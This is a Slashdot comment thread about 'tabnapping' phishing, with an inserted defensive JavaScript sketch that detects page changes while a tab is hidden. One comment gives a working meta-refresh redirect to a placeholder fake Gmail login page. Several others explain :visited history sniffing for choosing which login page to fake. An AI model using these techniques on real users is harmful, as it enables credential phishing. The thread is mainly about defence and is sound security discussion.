      This is the Internet; it's not your mommy, who will love you no matter what you do (supposedly).

    11. Re:disabling scripts on unfocused tabs? by Anonymous Coward · · Score: 0

      but you really need to think about what your suggestions will do before making them.

      "need to think"? Ahahahah! Coming from the idiot who claims Apple doesn't invest in R&D. Nice try fucktard. By the way, you really think the average Joe will have 4 tabs open to play some game and chat on same browser? The person who does that, is probably tech inclined enough to whitelist some sites.

      Keep trolling sopssa, every post you make just sheds more light on your ignorance.

      Idiot.

    12. Re:disabling scripts on unfocused tabs? by fuzzyfuzzyfungus · · Score: 1

      Technologically, yes. From a human interaction perspective, not really.

      Unless you want an audience of only security enthusiasts, having your browser break all sorts of common and legitimate websites by default is a no-go.

      If a site is convincing enough to phish somebody, it is probably convincing enough to get them to whitelist it (unless you make whitelisting such a pain in the ass that the bottom 20% of your users can't even figure it out).

      If you ship your own whitelist, you face the endless time-and-money-sucking battle of having to enumerate goodness on the internet.

      If you try to piggyback on some other mechanism (say, any site with a valid SSL cert gets on the whitelist), you still break legitimate sites that don't use or need SSL and don't break malicious sites that use innocuous URLs and simply depend on the user not checking them carefully (i.e. getting a reputable cert authority to give you a cert for "bankofam3rica.com" shouldn't be possible. That is an obvious phishing tool. Getting one for "blandurl.com" should be no problem, and nothing stops you from hosting a picture-perfect copy of the Bank of America login page on a blandurl.com subdomain.)

      Whitelisting only really works, behaviorally, in situations where a competent and dedicated decision-making authority exercises control over the user. Unfortunately, being such an authority is either a thankless task, or an all-too-rewarding one (either in terms of censorship potential, rent-extraction potential, or both.)

    13. Re:disabling scripts on unfocused tabs? by roman_mir · · Score: 1

      Those are great, aren't they? You missed another one: a delayed HTTP response, in effect a server 'push' to the browser.

      You use white listing to avoid this problem by detecting if a page is running scripts on the background and presenting the user with the obvious: "run always/never/this time/stay on page" dialog with an explanation of why this is.

      If they decide not to pay attention and click on whatever, well, I actually believe in social Darwinism and in this instance it really is not likely that someone will die if their bank account is emptied (though there is a remote chance of that.)

    14. Re:disabling scripts on unfocused tabs? by roman_mir · · Score: 1

      Well, the point was that a site that does not look like it's trying to phish anything changes all of a sudden (possible to do with a script or with a delayed HTTP response, sort of a server push) and this innocuous-looking site morphs into a phishing page.

      So if the site was a legitimate one (well, how legitimate is the real Facebook, but still) and then someone hijacked it, then it would be a problem for the user because the user would trust Facebook.

      If the site is not something that the user is familiar with, that would be the site to block from running scripts in the background unless it's white-listed upon the user switching to another tab or application. So the browser would have to detect whether there is a script running in the background of the site and ask the user to: allow always/never/this time/stay on page, and then whitelist the site if the 'allow always' option is chosen.

      Of course it's not going to prevent every single type of attack; it's just one more protection that can do pretty well if the user understands what is happening, of course.

      --

      Another possibility is to record what the tab/window looked like before the user left the page and then show the old page and the new one once the user returns. It's more complicated than the other proposal, it also has pitfalls, but there must be some options of dealing with this.

    15. Re:disabling scripts on unfocused tabs? by Lunix+Nutcase · · Score: 2

      Do you think that a dialog, warning a user who is switching from one screen to another with a 'allow always/never/this time/stay on this page' in case a site is running scripts on the background and then white-listing the site if the 'allow always' button is pushed is such an outrageous concept?

      Yes. That would be a huge annoyance to many users similar to all the UAC dialogs in Vista.

    16. Re:disabling scripts on unfocused tabs? by roman_mir · · Score: 1

      It could be an annoyance, I guess an annoyance of having your bank account emptied is not as big then? Just saying.

      Of course there are other options, like displaying to the user what the page looked like when they left it and what it looks like now, by the time they have returned to it, but again, an annoyance.

    17. Re:disabling scripts on unfocused tabs? by Anonymous Coward · · Score: 0

      I was going to answer exactly this same thing. Mod up.

    18. Re:disabling scripts on unfocused tabs? by roman_mir · · Score: 1

      Oh, and by the way, 'thinking about suggestions before making them' - that's outdated.

      There is time to act and there is time to think.

      This here, gentlemen, is not time to think.

      (of course, shamelessly ripped off from Canadian Bacon)

    19. Re:disabling scripts on unfocused tabs? by John+Hasler · · Score: 1

      > ...user would trust Facebook.

      Then it's all over anyway for them, isn't it?

      --
      Warning: this article may contain humor, sarcasm, parody, and perhaps even irony. Read at your own risk.
    20. Re:disabling scripts on unfocused tabs? by coryking · · Score: 1

      Then how do you play online games or use chat features on social sites?

      Do what the big-boys do and require the script to be code signed to run in a background tab?

      I dunno... might be an overkill to what amounts to a theoretical attack vector though.

    21. Re:disabling scripts on unfocused tabs? by delinear · · Score: 1

      The problem is, users don't understand what is happening, they just know that every single time they switch tabs they get this annoying prompt, for every single website they visit until they tick the "always allow" action - just think for a minute how annoying the entire internet experience would be if that was the situation. Even then, at the cost of spoiling the online experience, you've solved nothing when malicious users can still inject their attacks via adverts on otherwise trusted websites, as has happened recently.

    22. Re:disabling scripts on unfocused tabs? by delinear · · Score: 1

      Indeed, when I'm researching something I'll often pull up ten or so sites from the first page of my search results and read Slashdot while they're loading in the background. These are sites I likely haven't visited before so they won't be whitelisted, yet often they'll be AJAX heavy as they're usually web design/development oriented. It would be incredibly onerous if I had to individually open each site and wait for it to fully finish loading before opening the next. Not to mention you'd give rise to a whole slew of other issues. Opened a connection to a web service and then tabbed away before your AJAX request completes? Should the web service listen indefinitely until you decide to tab back and finish the request or should every AJAX script on the web that communicates with a web service be rewritten to allow this kind of stop-start approach without breaking/timeout issues?

    23. Re:disabling scripts on unfocused tabs? by __aayejd672 · · Score: 1

      Pfffff, just use IE6 - no tabs, no worries.

    24. Re:disabling scripts on unfocused tabs? by PenguinBob · · Score: 1

      That may work for more advanced users, but most new users aren't going to be able to figure it out.

    25. Re:disabling scripts on unfocused tabs? by this+great+guy · · Score: 1

      Disabling javascript is not sufficient. The malicious site could very well redirect to the malicious page after a long period of time, say 10 min, with:

      <meta http-equiv="refresh" content="600;url=http://example.com/malicious-gmail-login-page" />

      Although it is a little less sophisticated, it would work. Personally I have always been using 2 browsers for other reasons (to defend myself against CSRF vulnerabilities) and it turns out that doing so also protects me from 'tabnapping', even though CSRF and tabnapping are 2 completely different attacks. I described my setup here. This is a good example of defense-in-depth: using a security policy that ends up preventing future attacks that were unknown at the time the policy was implemented :-)

    26. Re:disabling scripts on unfocused tabs? by roman_mir · · Score: 1

      It is not actually true, since most websites do not run javascript in the background; most sites use real-time scripts. Those that do, that set timeouts or expect an asynchronous AJAX response for example, are in the minority.

    27. Re:disabling scripts on unfocused tabs? by roman_mir · · Score: 2, Interesting

      sure, there is also a possibility of a delayed HTTP response to a request, a so-called server push.

    28. Re:disabling scripts on unfocused tabs? by roman_mir · · Score: 1

      They don't really need to figure it out.

      Warn a user who is switching from one screen to another with a 'allow always/never/this time/stay on this page' in case a site is running scripts on the background and then white-list the site automatically if the 'allow always' button is pushed.

      There is also a possibility of showing the user what the page used to look like before the user left it and what it looks like now. This has pretty much the same problem though, if the user does not understand why the page used to look one way and now looks differently, as in the user decides that "sure, the page changed to this 'sign on' screen, that's fine, let me log into it".

      There is no stopping an ignorant user.
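
A defensive sketch of the "record what the tab looked like before the user left it and compare on return" idea raised in this subthread (posts 14, 16 and 28 above). This is an added example, not code from the original thread, from Aza Raskin's write-up or from any browser. It assumes the browser's Page Visibility API (`visibilitychange` event and `document.visibilityState`); the function names (`fingerprintPage`, `diffSnapshots`, `installTabGuard`) and the constructed sample pages are mine. The point it makes that the posts alone do not: the things worth snapshotting are not pixels but the features a user relies on to identify a page, namely title, URL, where forms submit to and whether a password field has appeared.

```javascript
// Added example: a tab-switch page-change monitor in the spirit of the
// "show what the page looked like before you left" proposal above. It is not
// code from the original write-up or from any browser; the function and
// field names (fingerprintPage, diffSnapshots, installTabGuard) are my own.
//
// Idea: when the tab goes to the background, snapshot the features a user
// relies on to identify a page (title, URL, where forms submit, password
// fields). When the tab comes back, snapshot again and report what changed.

// Collect the identity-relevant features of a page. `doc` is anything with
// the subset of the DOM API used here (title, querySelectorAll, location),
// so the function can be exercised outside a browser with a stub object.
function fingerprintPage(doc) {
  const forms = Array.from(doc.querySelectorAll('form'));
  const formTargets = forms
    .map(f => f.getAttribute('action') || '')
    .map(action => {
      // Resolve relative actions against the page so "/login" and the full
      // URL of the same endpoint compare equal; keep only the origin.
      try { return new URL(action, doc.location.href).origin; }
      catch (e) { return 'invalid:' + action; }
    })
    .sort();
  const passwordFields = doc.querySelectorAll('input[type="password"]').length;
  return { title: doc.title, href: doc.location.href, formTargets, passwordFields };
}

// Compare two snapshots and return human-readable findings. An empty array
// means nothing that identifies the page changed while it was hidden.
function diffSnapshots(before, after) {
  const findings = [];
  if (before.title !== after.title) {
    findings.push(`title changed: "${before.title}" -> "${after.title}"`);
  }
  if (before.href !== after.href) {
    findings.push(`location changed: ${before.href} -> ${after.href}`);
  }
  const known = new Set(before.formTargets);
  for (const origin of after.formTargets) {
    if (!known.has(origin)) findings.push(`new form target: ${origin}`);
  }
  if (after.passwordFields > before.passwordFields) {
    findings.push(`password field appeared (${before.passwordFields} -> ${after.passwordFields})`);
  }
  return findings;
}

// Wire the two functions to the Page Visibility API. `onChange` receives the
// findings whenever the tab returns to the foreground looking different.
function installTabGuard(doc, onChange) {
  let snapshot = null;
  doc.addEventListener('visibilitychange', () => {
    if (doc.visibilityState === 'hidden') {
      snapshot = fingerprintPage(doc);
    } else if (snapshot) {
      const findings = diffSnapshots(snapshot, fingerprintPage(doc));
      if (findings.length) onChange(findings);
      snapshot = null;
    }
  });
}

// Constructed stand-in for a DOM so the logic can be run with node.
function fakeDocument(title, href, formActions, passwordFields) {
  return {
    title,
    location: { href },
    querySelectorAll(selector) {
      if (selector === 'form') {
        return formActions.map(action => ({ getAttribute: () => action }));
      }
      if (selector === 'input[type="password"]') {
        return new Array(passwordFields).fill(null);
      }
      return [];
    },
    addEventListener() {},
  };
}

// Demonstration with constructed pages: a harmless article page that, while
// hidden, turned into a look-alike mail login page posting somewhere else.
function demo() {
  const before = fingerprintPage(fakeDocument(
    'Funny cat videos', 'https://example.org/cats', ['/search'], 0));
  const after = fingerprintPage(fakeDocument(
    'Webmail: sign in', 'https://example.org/cats',
    ['/search', 'https://collector.example.net/login'], 1));
  return diffSnapshots(before, after);
}

if (typeof document !== 'undefined') {
  installTabGuard(document, findings => console.warn('Tab changed while hidden:', findings));
}
```

Note that `location.href` does not change in the demo: the original write-up's page stays on its own URL and only its content changes, which is exactly why the URL bar alone is a weak signal and the form target and password-field checks are the ones that fire. As a bookmarklet or extension this could only guard pages it is injected into; as a browser feature it would be the "show old page next to new page" option roman_mir describes, minus the UI.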

    29. Re:disabling scripts on unfocused tabs? by Anonymous Coward · · Score: 0

      Why would something that I'm not watching need to send heartbeats? So what if my chat buddies see me as "Away"? When I'm not watching that tab, I am in fact away.

      I would love it if I could tell Firefox to stop script execution in tabs as soon as they lose focus. Javascript in background tabs is the second largest cause for Firefox becoming slow and crashy. (The largest cause is of course Flash.)

      There may be some cases where sites need to execute Javascript even when not interacting with the user, but for those cases they should use web workers anyway, and web workers should be excluded from the block.

  9. Not exactly. by khasim · · Score: 3, Informative

    Well for example I'm logged into facebook right now. As I'm jumping from site-to-site in Tab #2, one of them could hijack the Tab #1 and make it look like a legitimate facebook login screen.

    Not exactly. From his page on this "exploit"...

    You can try it out on this very website (I've only tested it in Firefox). Click away to another tab for at least five seconds. Flip to another tab. Do whatever. Then come back to this tab.

    It's hard to find, isn't it? It looks exactly like Gmail. I was lazy and took a screenshot of Gmail which loads slowly. It would be better to recreate the page in HTML.

    So his "exploit" is to wait until you are away from HIS tab and then alter HIS tab to look like it is a different site.

    1. Re:Not exactly. by jandrese · · Score: 2, Insightful

      The idea is that these users we always hear about who never have less than 50 tabs open can't remember which tabs are which, and if you put up a Facebook login screen or something, then you'll think it's just a timed out Facebook session.

      Even before tabbed browsing was popular, you could have done this with minimized or backgrounded windows too. To me the big problem is that he has to create a site that people will feel compelled to leave open while they go off and do something else. That will probably be the most difficult part.

      --

      I read the internet for the articles.
    2. Re:Not exactly. by WrongSizeGlass · · Score: 4, Interesting

      So his "exploit" is to wait until you are away from HIS tab and then alter HIS tab to look like it is a different site.

      Exactly ... but if the 'fake' site checks your browser history for the specific fake login screens they have in their repertoire then they can show one that you have used recently.

    3. Re:Not exactly. by somersault · · Score: 1

      Except your Facebook never times out unless you log into it on another computer or you don't tick the box to stay logged in.. which I suppose some people might if they don't know how to set up multiple accounts on their computer.

      To create a site that people will feel compelled to leave open while they go off and do something else.. that actually sounds incredibly easy - either a porn site or a "humourous" video amalgamation feed type thing which opens the links you click on in a new tab.

      --
      which is totally what she said
    4. Re:Not exactly. by Anonymous Coward · · Score: 0

      The idea is that these users we always hear about who never have less than 50 tabs open can't remember which tabs are which, and if you put up a Facebook login screen or something, then you'll think it's just a timed out Facebook session.

      I'm one of those who often have lots of tabs open. I don't mean 50, I mean enough that Firefox gets slow to open tabs, without swapping (I recently replaced all swap with RAM, so it cannot swap). 50 tabs would be something like 4 pages worth of images (there's usually between 12 and 20 images per page), and I have more like 20 pages worth of images. I have never counted, but I would say that 200 tabs is too low.

      However, if I found a Facebook login page among those, I would not think it was one I opened deliberately. I keep my tabs well separated, and all of these 200 tabs are supposed to be pr0n. If one isn't (like those links that redirect to Google), it gets closed. If I had a Facebook account, it would be in a different browser profile. Now tell me how any of those 200 tabs would get access to THAT.

    5. Re:Not exactly. by delinear · · Score: 1

      Except your Facebook never times out unless you log into it on another computer or you don't tick the box to stay logged in.. which I suppose some people might if they don't know how to set up multiple accounts on their computer.

      More likely users on public machines who might want to have a few windows open while they're working but don't want to have to remember to sign out if they get called away for a few hours and don't have a chance to return to their session.

      To create a site that people will feel compelled to leave open while they go off and do something else.. that actually sounds incredibly easy - either a porn site or a "humourous" video amalgamation feed type thing which opens the links you click on in a new tab.

      Not that easy, in fact, if you could come up with a way to create sites people never wanted to close (and to repeat the success at will, because as soon as your original phishing site got blacklisted you'd have to be able to create a new one) then you could earn very good money legitimately without needing to phish.

    6. Re:Not exactly. by nmg196 · · Score: 1

      How? You can't check someone's browser history using JavaScript.

    7. Re:Not exactly. by causality · · Score: 1

      Well for example I'm logged into facebook right now. As I'm jumping from site-to-site in Tab #2, one of them could hijack the Tab #1 and make it look like a legitimate facebook login screen.

      Not exactly. From his page on this "exploit"...

      You can try it out on this very website (I've only tested it in Firefox). Click away to another tab for at least five seconds. Flip to another tab. Do whatever. Then come back to this tab.

      It's hard to find, isn't it? It looks exactly like Gmail. I was lazy and took a screenshot of Gmail which loads slowly. It would be better to recreate the page in HTML.

      So his "exploit" is to wait until you are away from HIS tab and then alter HIS tab to look like it is a different site.

      I use both NoScript and RequestPolicy. I am thinking that those two would make such an attack rather difficult, even if I was too lazy to pay attention to the URL before submitting login information.

      --
      It is a miracle that curiosity survives formal education. - Einstein
    8. Re:Not exactly. by EngivalX · · Score: 1

      Using the CSS "exploit": you create a list of links that load a specific background image on the "visited" style. Your browser happily goes and loads those images for anything that's in your history.

    9. Re:Not exactly. by Anonymous Coward · · Score: 0

      How? You can't check someone's browser history using JavaScript.

      You can do it with CSS. This was discussed just last week on Slashdot. You can't directly read the history, but you can use CSS to find out if a certain URL is in the history.

    10. Re:Not exactly. by Teese · · Score: 1

      There's the whole visited link color issue. Basically the page can tell what the color of a link is, and if the color is the "visited link" color, you know the user visits that page. So the page puts up a bunch of URLs and checks to see which of the URLs are in the visited link color. They now know which sites you have visited somewhat recently.

      --
      "I'm a Genius!"*


      *Not an actual Genius
    11. Re:Not exactly. by Anonymous Coward · · Score: 0

      The basic concept involves finding out what color your browser displays a link, links you've been to before are a different color. It's an old flaw that no-one seems to have fixed yet, possibly Firefox 4 will attempt to address it.

      The Register article.

    12. Re:Not exactly. by hairyfeet · · Score: 1

      This attack also assumes everyday folks act like geeks here at /. and they don't. I don't know how many customers I have that consider a browser to be ONE window and one window only, even after switching them to FF. Those that do use tabs almost never have more than three.

      My GF is a perfect example, as she thinks I'm a genius for setting her up a bookmarked group of tabs. I set it up exactly as she likes to surf, which is one tab at the Yahoo home page, one tab for her email, and one for FB. And that's it. She will NEVER add a fourth tab, even though she knows how. She says it gets "too cluttered and confusing" to even watch me run with a dozen or more tabs, and she has no desire whatsoever to try it herself. As it is now she has FB on the right, email on the left, and Yahoo in the center and she is a happy camper.

      So while this might work for a /. geek with a dozen or more tabs open, working PC repair I can say average folks just don't do that. Even after me switching them over and showing them how tabs work they simply never use that feature except very sparingly. But even with this little "exploit" I wouldn't change them off FF, no way. Having ABP cuts down on a hell of a lot of nasties and with so many still running XP FF is the safer bet.

      --
      ACs don't waste your time replying, your posts are never seen by me.
    13. Re:Not exactly. by Qzukk · · Score: 1

      Not that easy, in fact, if you could come up with a way to create sites people never wanted to close

      Or just get your script embedded in someone else's website through cross-site scripting or an ad network willing to look the other way for money.

      --
      If I have been able to see further than others, it is because I bought a pair of binoculars.
    14. Re:Not exactly. by Qzukk · · Score: 1

      You can't check someone's browser history using JavaScript

      You don't read slashdot enough: :visited

      --
      If I have been able to see further than others, it is because I bought a pair of binoculars.
    15. Re:Not exactly. by squiggleslash · · Score: 1

      FWIW I've seen the proof-of-concept sites that supposedly bring up every site you've ever visited, and using the system is very hit-or-miss. I have no Facebook account, for example, but the site came up, presumably because at some point in the past I clicked on a link that turned out to be a FB profile.

      Even banks might be more awkward than it appears: numerous banks and credit card companies appeared on my list of visited links, despite me not recalling ever visiting them, until I remembered that I'd done some research into getting a new card a year or so ago.

      The bottom line is that a site that uses such a system to determine the phishing sites to pick will more likely than not create numerous fake "You have been logged out" pages for sites you never logged into, and you know you never logged into.

      --
      You are not alone. This is not normal. None of this is normal.
    16. Re:Not exactly. by somersault · · Score: 1

      It's weird, because I rarely have more than say 3-4 tabs open myself, even when I've got both work and play tabs going. And the first person I saw to truly use loaaads of tabs (my last gf) was not even a geek! And in fact she seemed of only average intelligence and considered herself "not very good with technology" so I was quite impressed at first. Though personally I like to maintain a clean virtual working space (my desk isn't quite so pretty) when it comes to things like my desktop and my browser, so having 10 tabs on the go does seem messy to me if you aren't using half of them for 99% of the time - especially if like me you use a separate mail client and/or a Chrome extension for interacting with GMail.

      Anyhoo, she did inspire me to start trying to leave regularly used pages open (Slashdot, Facebook, deviantArt) - only with Chrome you can do that as pinned tabs which makes it a lot more convenient than having loads of massive tabs taking up space.

      But still I've ended up just going back to using hardly any tabs and checking stuff like Facebook periodically rather than leaving it open. I guess the fact that I'm running on a netbook where having lots of tabs open can end up slowing things down doesn't help.

      --
      which is totally what she said
    17. Re:Not exactly. by sexconker · · Score: 1

      Or just get your script embedded in someone else's website through cross-site scripting or an ad network willing to look the other way for money.

      Ad networks that are willing to look the other way for money are called "ad networks".

    18. Re:Not exactly. by Sancho · · Score: 1

      FWIW I've seen the proof-of-concept sites that supposedly bring up every site you've ever visited, and using the system is very hit-or-miss. I have no Facebook account, for example, but the site came up, presumably because at some point in the past I clicked on a link that turned out to be a FB profile.

      That's not a miss, then, is it? You visited Facebook. It doesn't make the technique invalid in the slightest.

      Even banks might be more awkward than it appears: numerous banks and credit card companies appeared on my list of visited links, despite me not recalling ever visiting them, until I remembered that I'd done some research into getting a new card a year or so ago.

      The bottom line is that a site that uses such a system to determine the phishing sites to pick will more likely than not create numerous fake "You have been logged out" pages for sites you never logged into, and you know you never logged into.

      And lucky you, you won't be fooled. But if enough people are fooled, then the exploit is successful.

      Kinda like me. Every once in a while, I come across a page which tells me it's scanning for viruses. It looks just like a regular Windows XP themed window--except that I'm using Linux. But I don't go around saying how stupid or foolish the author was, or that the hack obviously doesn't work.

    19. Re:Not exactly. by yotto · · Score: 1

      To me the big problem is that he has to create a site that people will feel compelled to leave open while they go off and do something else. That will probably be the most difficult part.

      Not at all. I frequently open a dozen or so tabs from a Google search, or news aggregator, or other such link-heavy site. Then I go through them one by one reading, disregarding, following more links, etc. Each goes into its own tab. Frequently, I get tired of a topic before I make it through the tabs, but leave them open in case I feel like revisiting.

      I am not even compelled to leave these tabs open while doing something else. I am never on them in the first place. Tabs open in the background.

    20. Re:Not exactly. by ArsenneLupin · · Score: 1

      That's not a miss, then, is it? You visited Facebook. It doesn't make the technique invalid in the slightest.

      It doesn't make the technique invalid, it only makes it unsuitable for this attack. Too many false positives, and people become suspicious about login tabs that seem to pop up from out of nowhere...

      But then, the history snooping works on exact URLs. These test sites were proof-of-concept, so they probably chose the target site's root URL, rather than picking a URL which would only get fetched after an actual login. A real attacker would choose his URLs more carefully.

    21. Re:Not exactly. by ckaminski · · Score: 1

      I have two laptops. One currently has 250 tabs open, because I haven't taken the time to pare down my research links in over a month. The other has roughly 50 open, same issue. Both are running between 800 and 1800MB of RAM. What I need is an improved version of Prism, where I can put tabs into real windows.

      Prism for IE would rule. Trying to use VMWare Lab Manager as both an admin and as a user is problematic when my tabs all share the same user profile.

    22. Re:Not exactly. by squiggleslash · · Score: 1

      That's not a miss, then, is it? You visited Facebook. It doesn't make the technique invalid in the slightest.

      No, it's a miss, for the application we're talking about. The fact I "visited" a site doesn't mean I'm a user of that site, in the sense that a history snooper is interested in. Snoopers are trying to gather information about you, whether it's to sell you viagra or to steal your passwords. So a technique that happens to register true for a large subset of websites regardless of whether the user of the web browser has actually spent any time there is useless.

      What you end up with, using this technique, is a situation where thousands of websites will end up in 90% of people's histories, but only a much smaller portion will actually be useful. Sure, it's quite possible the majority of people with Facebook in their histories are Facebook users, but that's only because, in my experience, the majority of web users are Facebook users. A much better question is "Do the majority of non-Facebook users actually have Facebook in their histories?" to which the answer is almost certainly "Yes."

      The :visited hack is an interesting technique that has little technical use. Outside of a small set of speciality sites (and, no, I'm not talking porn, given porn redirects are common too) you're not going to get any useful information out of the hack that tells you what websites the user actually frequents.

      I would hazard a guess that if anyone using the technique is successful, it'll not be because they used the hack, but rather because the hack picked a popular target. That is to say, there's probably no difference in success rate for a site that puts up Facebook without checking the user's history, and a site that checks the user's history first before putting it up.

      --
      You are not alone. This is not normal. None of this is normal.
    23. Re:Not exactly. by Manos_Of_Fate · · Score: 1

      I assume you're "researching" female anatomy?

      --
      Isn't enough that I ruined a pony, making a gift for you?
    24. Re:Not exactly. by vux984 · · Score: 1

      I set it up exactly as she likes to surf, which is one tab at the Yahoo home page, one tab for her email, and one for FB. And that's it.

      So while this might work for a /. [...] I can say average folks just don't do that.

      Don't speculate, experiment. Next time your GF leaves her computer for an extended length of time, rearrange the tabs so facebook is on the left instead of the right, and logout of facebook.

      See if she freaks out and panics or simply logs back into facebook when she gets back.

      Either way, a single data point is pretty meaningless, but I give better than 50/50 odds that when she gets back she'll log into facebook without batting an eye at it, and if she does your entire hypothesis is blown.

    25. Re:Not exactly. by Actually,+I+do+RTFA · · Score: 1

      The idea is that these users we always hear about who never have less than 50 tabs open can't remember which tabs are which, and if you put up a Facebook login screen or something, then you'll think it's just a timed out Facebook session.

      I have a lot of tabs open right now, but I would think I would notice if someone put up a Facebook or Gmail login. Those are opened in different browsers. And a different OS for banking/anything to do with money.

      Not to mention that without javascript and/or flash, I doubt his exploit will affect me.

      --
      Your ad here. Ask me how!
    26. Re:Not exactly. by somersault · · Score: 1

      I hope you have anything important bookmarked in case your machine suddenly dies and FF/Chrome/whatever can't re-open the tabs for whatever reason!

      --
      which is totally what she said
    27. Re:Not exactly. by hairyfeet · · Score: 1

      You seem to be making a few assumptions bubba. One, that she actually walks away from the PC and leaves it running, which ever since her son-in-law jumped on her PC when she forgot and left it running and left a bunch of "free games!" spyware for me to clean, is something she does NOT do, ever. When she gets up the page is closed and she logs off, which is why she thinks I'm a genius for setting up those grouped tabs she can open in a single click. Instead of having to launch each tab individually she now sits down and hits the button and everything goes.

      Second you assume I have such disregard for my genitalia that I would go piss with her stuff. Here is one of the "Great Laws of the Universe" I bestow upon thee for free: She's in charge. You may THINK you're in charge, but you're not, she just lets you think that so you don't get your feelings hurt. My Brenda is EXTREMELY anal retentive about having everything just so, with everything in its proper place, and she tends to get...well rather cranky when things aren't where they are supposed to be. And since a cranky GF is never a good thing I'm gonna have to pass. Considering how she is about order I have no doubt I'd be getting called because the "PC is broken!" if her tabs were out of order anyway.

      But the point is the average non-geek (like my Brenda) doesn't have enough tabs open EVER to not notice identical tabs. And from TFA this exploit doesn't seem to be able to close an existing tab, simply to make one page appear to be another. Now if you have 50 tabs open this would be trivial to hide, with 2 to 3? Not so much. And since I build as well as repair computers one of the things I do is have them go through typical routines with me there so I can see usage patterns and here is what I have found:

      The average user IF they use tabs 99 times out of 100 will have one for their webmail, and one for surfing. Those that are into social networking will add one for FB. Most never do that, and simply use the Yahoo home page as a web portal, where they check their mail, "read the paper", check sports scores or their horoscope, and then use the search engine at top to get onto the "bigger web" and that's pretty much it. You'd be surprised at how many PCs I've had where I go to back up their favorites and find they have NONE, and simply use Yahoo search to get to their web pages. Folks are creatures of habit and simply don't change much. If it worked before that is how they are doing it now. Many of the average folks simply don't see the use in tabs, don't ask me why, that is just "their way" I guess.

      --
      ACs don't waste your time replying, your posts are never seen by me.
    28. Re:Not exactly. by improfane · · Score: 1

      A real attacker would be smart, maybe even going so far as to add some random behaviour like only opening a page in a proportion of cases.

      You could strike gold with only 1 Facebook account out of 1000 as the chances are the email password will be the same.

      --
      Slashdot needs Geekcode | Can anyone recommend any good SCIFI? My tastes: Foundation, Startide Rising, CITY, Ringworld,
    29. Re:Not exactly. by Anonymous Coward · · Score: 0

      You can't know if a site has been visited recently. You can only figure out if it's been visited or not.

    30. Re:Not exactly. by jp10558 · · Score: 1

      Seeing as I use Opera, do other users find that Firefox often can't re-open the tabs after a crash? I'm actually amazed how often it can't open the tabs. Is Chrome that bad also? Opera just about never loses the session, and if it did, there's a backed up session file you can go to to get it back.

      --
      Opera, Proxomitron-Grypen,GPG 0x0A1C6EE3
  10. A little peeved! by scamdetect · · Score: 1, Informative

    Dear Slashdot: I submitted the above story this morning and was pleased when it was accepted for publication on your website. However, I was a little peeved to find that the link I included in the story - was substituted in the final story with this one. Obviously this substitution removes any benefit whatsoever of my having taken the time to write the blog post and submit it to slashdot in the first place. Any chance of swapping the link back?

    1. Re:A little peeved! by simoncpu+was+here · · Score: 1, Insightful

      Are you sure this post is not a scam that is intended to drive traffic to your site?

    2. Re:A little peeved! by scamdetect · · Score: 1, Interesting

      Ha ha! Very droll!! Original submission is here.

    3. Re:A little peeved! by Anonymous Coward · · Score: 1, Interesting

      Dear Slashdot:

      I submitted the above story this morning and was pleased when it was accepted for publication on your website.

      However, I was a little peeved to find that the link I included in the story - was substituted in the final story with this one.

      Obviously this substitution removes any benefit whatsoever of my having taken the time to write the blog post and submit it to slashdot in the first place.

      Any chance of swapping the link back?

      Slashdot seems to "favor" krebsonsecurity.com for some reason, and might have some behind-the-scenes agreement with them to shove traffic to them artificially. Please don't operate under any assumption that the /. "editor" staff is going to be fair and objective. They have their agendas, and have certainly rewritten submissions to suit their purposes in the past.

    4. Re:A little peeved! by clickety6 · · Score: 5, Insightful

      First tab-nabbing and now submission-nabbing where the link in the article changes after submission!

      --
      ----------------------------------- My Other Sig Is Hilarious -----------------------------------
    5. Re:A little peeved! by mysidia · · Score: 5, Insightful

      Slashdot is about news, not driving traffic to someone's website.

      And 'getting traffic' is not some kind of exchange or reward offered for submitting an article.

      If a different link is editorially better, then it is expected that the editors will swap it.

    6. Re:A little peeved! by Anonymous Coward · · Score: 3, Insightful

      Regardless of which link is in the story, I still greatly benefit from you having taken the time to write the blog post and submit it to slashdot. Thank you for that.

      Oh, you meant benefit to you! What do you think slashdot is? Just a way to generate eyeballs for your personal blog? Screw you for that.

    7. Re:A little peeved! by Anonymous Coward · · Score: 0

      Well in case you were wondering, the name tabnapping was dubbed originally by a commenter on the post at Krebsonsecurity. The Firefox guy then updated his page based on that krebsonsecurity comment. You then wrote your post with a title along the lines of "tabnapping." Sorry pal but Brian Krebs beat you to the punch, as evidenced by the title of your post.

    8. Re:A little peeved! by Anonymous Coward · · Score: 0

      Dear scamdetect: You submit stories here, not links to your blog. Yours sincerely, Slashdot.

    9. Re:A little peeved! by scamdetect · · Score: 1

      My blog is there to warn internet users about the dangers of online fraud and scams of this very nature. Whilst the posting of my article helps to do that (for which I am grateful to Slashdot) yes, I had hoped that the editors would post the article as written (including the link) as Slashdot stories are widely re-blogged and yes, I would have benefitted from the backlinks. That's a valid reason for including the link and for being disappointed that it was replaced - isn't it?

    10. Re:A little peeved! by Anonymous Coward · · Score: 2, Insightful

      I agree it was transparently disrespectful of CmdrTaco to approve your submission, but with someone else's link. However:

      1. The linked article predates your linked blog according to the submission timestamps on each blog
      2. The linked article contains further links to relevant information, including a link to the original subject's website and a proof-of-concept site.

      I understand the euphoric feeling you got when your submission was accepted, and I also understand that sinking sensation you felt when you realized your blog was not linked-to even though your submission was accepted. That being said, repackaged news is repackaged news is repackaged news and I don't think you will find much sympathy around here that your (arguably, less useful) brand of news repackaging won't be netting you ad dollars like you intended.

    11. Re:A little peeved! by roman_mir · · Score: 1

      At least you can't accuse this story of hypocrisy and of not living up to its expectations.

    12. Re:A little peeved! by scamdetect · · Score: 1

      You're right, the linked-to blog does pre-date mine, however it was my submission that was accepted and my form of words that makes up the body of that submission. It would have been nice to get the recognition for that work... In answer to your comment about ad dollars - I fully expect that slashdot readers don't click on ads. The ads that do appear on my site barely cover the hosting costs, let alone my time in maintaining the website.

    13. Re:A little peeved! by mcgrew · · Score: 5, Insightful

      That's a valid reason for including the link and for being disappointed that it was replaced - isn't it?

      Not in my eyes it isn't, and I wish they'd do it more often -- like when the submission has ten ad-laden one-paragraph pages I wish they'd link to a single page view, whether that site or another. Of course you think your blog was better than krebsonsecurity, but personally I almost never click on any link with "blog" in the name, especially from slashdot. They've gotten a lot of (well deserved) flak in the past for linking a blog that links an original story, and I'm glad they're listening.

      Be glad that they didn't rewrite the entire summary as they've done with some of my submissions.

      A submission is supposed to benefit the slashdot community, not the submitter. Too often people like you make submissions just to drive traffic to their own site for the money.

      Shame on you.

    14. Re:A little peeved! by scamdetect · · Score: 1, Troll

